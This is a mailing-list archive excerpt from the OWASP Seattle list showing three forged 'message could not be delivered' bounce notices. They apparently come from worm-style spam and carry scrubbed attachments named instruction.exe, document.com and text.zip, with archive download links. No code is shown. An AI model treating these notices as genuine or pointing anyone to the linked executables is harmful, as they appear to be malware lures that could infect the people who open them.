From MAILER-DAEMON at lists.owasp.org  Mon Dec 20 07:01:04 2010
From: MAILER-DAEMON at lists.owasp.org (Automatic Email Delivery Software)
Date: Mon, 20 Dec 2010 14:01:04 +0200
Subject: [Owasp-seattle] Message could not be delivered
Message-ID: <mailman.22.1292849577.2285.owasp-seattle@lists.owasp.org>

Message could not be delivered

-------------- next part --------------
A non-text attachment was scrubbed...
Name: text.zip
Type: application/octet-stream
Size: 29092 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-seattle/attachments/20101220/66640e5d/attachment.obj 

From noreply at lists.owasp.org  Tue Dec 21 22:18:05 2010
From: noreply at lists.owasp.org (Mail Administrator)
Date: Wed, 22 Dec 2010 11:18:05 +0800
Subject: [Owasp-seattle] (no subject)
Message-ID: <mailman.29.1292991505.2285.owasp-seattle@lists.owasp.org>

The original message was received at Wed, 22 Dec 2010 11:18:05 +0800 from lists.owasp.org [214.74.246.78]

----- The following addresses had permanent fatal errors -----
owasp-seattle at lists.owasp.org

----- Transcript of the session follows -----
... while talking to lists.owasp.org.:
554 <owasp-seattle at lists.owasp.org>... Mail quota exceeded
554 <owasp-seattle at lists.owasp.org>... Service unavailable

-------------- next part --------------
A non-text attachment was scrubbed...
Name: instruction.exe
Type: application/octet-stream
Size: 28864 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-seattle/attachments/20101222/e658e5c9/attachment.exe 

From MAILER-DAEMON at lists.owasp.org  Thu Dec 23 03:40:14 2010
From: MAILER-DAEMON at lists.owasp.org (Automatic Email Delivery Software)
Date: Thu, 23 Dec 2010 00:40:14 -0800
Subject: [Owasp-seattle] Error
Message-ID: <mailman.31.1293010758.2285.owasp-seattle@lists.owasp.org>

The original message was received at Thu, 23 Dec 2010 00:40:14 -0800 from lists.owasp.org [186.132.200.30]

----- The following addresses had permanent fatal errors -----
owasp-seattle at lists.owasp.org



-------------- next part --------------
A non-text attachment was scrubbed...
Name: document.com
Type: application/octet-stream
Size: 28864 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-seattle/attachments/20101223/20aee497/attachment.obj 

